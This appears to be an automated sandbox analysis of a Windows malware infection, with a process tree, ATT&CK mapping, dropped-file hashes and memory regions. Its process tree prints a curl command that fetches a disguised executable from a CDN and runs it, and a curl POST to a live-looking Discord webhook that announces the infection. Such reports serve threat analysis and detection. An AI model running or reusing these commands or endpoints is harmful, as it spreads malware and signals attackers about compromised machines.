                                                                                                            PID:1736
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                            4⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3804
                                                                                                            • C:\Windows\SysWOW64\curl.exe
                                                                                                              curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                              5⤵
                                                                                                                PID:5104
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1396
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, and $77-install.exe` Was Just On On Admin's PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:2980
                                                                                                              • C:\Windows\SysWOW64\curl.exe
                                                                                                                curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, and $77-install.exe` Was Just On On Admin's PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                                                5⤵
                                                                                                                  PID:4696
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                          1⤵
                                                                                                            PID:3580
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                            1⤵
                                                                                                              PID:3772
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:3972
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4192
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4812
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                    1⤵
                                                                                                                      PID:4032
                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                      1⤵
                                                                                                                        PID:560
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                        1⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:4460
                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                        1⤵
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:3336
                                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:1540
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                          1⤵
                                                                                                                            PID:2008
                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                            1⤵
                                                                                                                              PID:4488
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                              1⤵
                                                                                                                                PID:4520
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
                                                                                                                                1⤵
                                                                                                                                  PID:5052
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2ac,0x7ff9d0222e98,0x7ff9d0222ea4,0x7ff9d0222eb0
                                                                                                                                    2⤵
                                                                                                                                      PID:3984
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2292 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:3
                                                                                                                                      2⤵
                                                                                                                                        PID:4824
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3912 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
                                                                                                                                        2⤵
                                                                                                                                          PID:5392
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                        1⤵
                                                                                                                                          PID:5068
                                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:5092
                                                                                                                                          • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                            C:\Windows\System32\WaaSMedicAgent.exe b765834be7b61b3dd973bea0c0d7e5ab CS5xfzsoDUSBZ/cngqUv2A.0.1.0.0.0
                                                                                                                                            1⤵
                                                                                                                                              PID:4956
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                2⤵
                                                                                                                                                  PID:2868
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                1⤵
                                                                                                                                                  PID:3192
                                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:2180
                                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1628
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4980
                                                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:2196
                                                                                                                                                    • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                      C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      PID:5908

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                    Execution

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Persistence

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Privilege Escalation

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Defense Evasion

                                                                                                                                                    Modify Registry

                                                                                                                                                    1
                                                                                                                                                    T1112

                                                                                                                                                    Discovery

                                                                                                                                                    Query Registry

                                                                                                                                                    7
                                                                                                                                                    T1012

                                                                                                                                                    System Information Discovery

                                                                                                                                                    6
                                                                                                                                                    T1082

                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                    1
                                                                                                                                                    T1120

                                                                                                                                                    Command and Control

                                                                                                                                                    Web Service

                                                                                                                                                    1
                                                                                                                                                    T1102

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                      Filesize

                                                                                                                                                      290B

                                                                                                                                                      MD5

                                                                                                                                                      02005e59af3fbd84f4a83968fc8da952

                                                                                                                                                      SHA1

                                                                                                                                                      40578ee448aa3109d026e84a8b12ee9a0479ce78

                                                                                                                                                      SHA256

                                                                                                                                                      1063934742a6e15a378f49d13630faf75fc99eb37432c0b2efdc9af3dad103fb

                                                                                                                                                      SHA512

                                                                                                                                                      f246e9170d1b9da51b322d73fed994c7bd35a0bf6a2ddeec600e0a8a386cf82a0cfb28517e220a98d7dfb19cdc61eaf56275f1c2d16920d4f984390d98c6f0ed

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log
                                                                                                                                                      Filesize

                                                                                                                                                      654B

                                                                                                                                                      MD5

                                                                                                                                                      2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                      SHA1

                                                                                                                                                      684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                      SHA256

                                                                                                                                                      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                      SHA512

                                                                                                                                                      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dropper.exe.log
                                                                                                                                                      Filesize

                                                                                                                                                      425B

                                                                                                                                                      MD5

                                                                                                                                                      4eaca4566b22b01cd3bc115b9b0b2196

                                                                                                                                                      SHA1

                                                                                                                                                      e743e0792c19f71740416e7b3c061d9f1336bf94

                                                                                                                                                      SHA256

                                                                                                                                                      34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

                                                                                                                                                      SHA512

                                                                                                                                                      bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                                                                                      Filesize

                                                                                                                                                      66KB

                                                                                                                                                      MD5

                                                                                                                                                      514d0abd73e992c2a1622795b33f17f4

                                                                                                                                                      SHA1

                                                                                                                                                      96740e82d7a119d808000783507bd92690584fe6

                                                                                                                                                      SHA256

                                                                                                                                                      b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53

                                                                                                                                                      SHA512

                                                                                                                                                      4600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                                                                      Filesize

                                                                                                                                                      163KB

                                                                                                                                                      MD5

                                                                                                                                                      1a7d1b5d24ba30c4d3d5502295ab5e89

                                                                                                                                                      SHA1

                                                                                                                                                      2d5e69cf335605ba0a61f0bbecbea6fc06a42563

                                                                                                                                                      SHA256

                                                                                                                                                      b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

                                                                                                                                                      SHA512

                                                                                                                                                      859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                                                                      Filesize

                                                                                                                                                      256KB

                                                                                                                                                      MD5

                                                                                                                                                      18f497deffe88b6b2cff336a277aface

                                                                                                                                                      SHA1

                                                                                                                                                      4e1413241d3d3e4dbff399d179f8fd64f3ecd39e

                                                                                                                                                      SHA256

                                                                                                                                                      8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5

                                                                                                                                                      SHA512

                                                                                                                                                      35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                                                                      Filesize

                                                                                                                                                      299KB

                                                                                                                                                      MD5

                                                                                                                                                      12d2d1f43b0ecf5a949adde54b1ffb65

                                                                                                                                                      SHA1

                                                                                                                                                      ad0529bc9102210f3616c7b626c37d6454d44033

                                                                                                                                                      SHA256

                                                                                                                                                      619b345f6803d45bcf20305efb3407a8ae26ba0aaffe38e7b5f31cb8c26101ef

                                                                                                                                                      SHA512

                                                                                                                                                      0a55fc91d0bc7e3123b16b012c70c15f731c3be1f8499c733cc994fcec43d8cdf6279e0b9eedda35035423c8891e076be374c512d6506d81e1f81802af25153f

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp1C5D.tmp.bat
                                                                                                                                                      Filesize

                                                                                                                                                      155B

                                                                                                                                                      MD5

                                                                                                                                                      cf6f69e74f621aff876514aed5d97fba

                                                                                                                                                      SHA1

                                                                                                                                                      5b9d4426a5b5fdc9e133805c3cbdc8f315e2f9cd

                                                                                                                                                      SHA256

                                                                                                                                                      4a376d4ee53a165b79922cb37f65ec60b3c2b47c8eac3a16cad94fda1cc3376d

                                                                                                                                                      SHA512

                                                                                                                                                      549d279392208b9172a102ff0aa5ed48c02d14e469cabd998d8d37b4b9a20e0e896630ab6d135a0b187f6a813c22ec0f2bd0e3185e1bb5856badaf6e466456c5

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                      SHA1

                                                                                                                                                      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                      SHA256

                                                                                                                                                      ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                      SHA512

                                                                                                                                                      c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      f313c5b4f95605026428425586317353

                                                                                                                                                      SHA1

                                                                                                                                                      06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                      SHA256

                                                                                                                                                      129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                      SHA512

                                                                                                                                                      b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                      SHA1

                                                                                                                                                      a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                      SHA256

                                                                                                                                                      98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                      SHA512

                                                                                                                                                      1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                      SHA1

                                                                                                                                                      63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                      SHA256

                                                                                                                                                      727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                      SHA512

                                                                                                                                                      f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                      SHA1

                                                                                                                                                      5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                      SHA256

                                                                                                                                                      55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                      SHA512

                                                                                                                                                      5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                      SHA1

                                                                                                                                                      9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                      SHA256

                                                                                                                                                      a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                      SHA512

                                                                                                                                                      c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                    • C:\Windows\TEMP\tmp58D9.tmp.bat
                                                                                                                                                      Filesize

                                                                                                                                                      163B

                                                                                                                                                      MD5

                                                                                                                                                      10fb0ba32d785621cf5eb84f9b8c6d20

                                                                                                                                                      SHA1

                                                                                                                                                      25eb07e54fdda1432e1f64a861562dbf76c840c2

                                                                                                                                                      SHA256

                                                                                                                                                      e74fcf3d96338859b2790228d4eb3f822bb8573f49ba3df8c381c74d9626033d

                                                                                                                                                      SHA512

                                                                                                                                                      f085a2ae4e80fd652ebf617cee7bbb3e0c75687cb2fcd7dec1e9213c7ac7a1afe5b172ebb689117c8dc2b7171aacf7e73be9f15cae1d48b2abb145df9d41fa69

                                                                                                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_cdvtq5xj.cqq.ps1
                                                                                                                                                      Filesize

                                                                                                                                                      60B

                                                                                                                                                      MD5

                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                      SHA1

                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                      SHA256

                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                      SHA512

                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                    • memory/388-102-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/388-95-0x00000288319C0000-0x00000288319EB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/388-101-0x00000288319C0000-0x00000288319EB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/528-106-0x000002B4E0DA0000-0x000002B4E0DCB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/632-68-0x000002832EE90000-0x000002832EEBB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/632-60-0x000002832EE60000-0x000002832EE85000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      148KB

                                                                                                                                                    • memory/632-62-0x000002832EE90000-0x000002832EEBB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/632-69-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/632-61-0x000002832EE90000-0x000002832EEBB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/688-73-0x000001A6C93D0000-0x000001A6C93FB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/688-79-0x000001A6C93D0000-0x000001A6C93FB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/688-80-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/968-90-0x0000018F307D0000-0x0000018F307FB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/968-84-0x0000018F307D0000-0x0000018F307FB000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/968-91-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1308-38-0x000002161E730000-0x000002161E752000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/1308-46-0x0000021636F80000-0x0000021636FAA000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      168KB

                                                                                                                                                    • memory/1308-47-0x00007FF9F56F0000-0x00007FF9F58E5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/1308-48-0x00007FF9F3DB0000-0x00007FF9F3E6E000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      760KB

                                                                                                                                                    • memory/1724-56-0x00007FF9F3DB0000-0x00007FF9F3E6E000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      760KB

                                                                                                                                                    • memory/1724-57-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/1724-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/1724-49-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/1724-54-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/1724-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/1724-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      32KB

                                                                                                                                                    • memory/1724-55-0x00007FF9F56F0000-0x00007FF9F58E5000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/1736-985-0x000000001CEE0000-0x000000001CF56000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      472KB

                                                                                                                                                    • memory/1736-17-0x0000000001120000-0x0000000001126000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      24KB

                                                                                                                                                    • memory/1736-16-0x0000000000930000-0x0000000000976000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      280KB

                                                                                                                                                    • memory/1964-32-0x0000000074E40000-0x00000000755F0000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      7.7MB

                                                                                                                                                    • memory/1964-4-0x0000000074E40000-0x00000000755F0000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      7.7MB

                                                                                                                                                    • memory/2316-8-0x0000000000B90000-0x0000000000BA6000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      88KB

                                                                                                                                                    • memory/4304-12-0x00000000009B0000-0x0000000000A02000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      328KB

                                                                                                                                                    • memory/4544-0-0x0000000074E4E000-0x0000000074E4F000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/4544-1-0x0000000000600000-0x000000000060A000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      40KB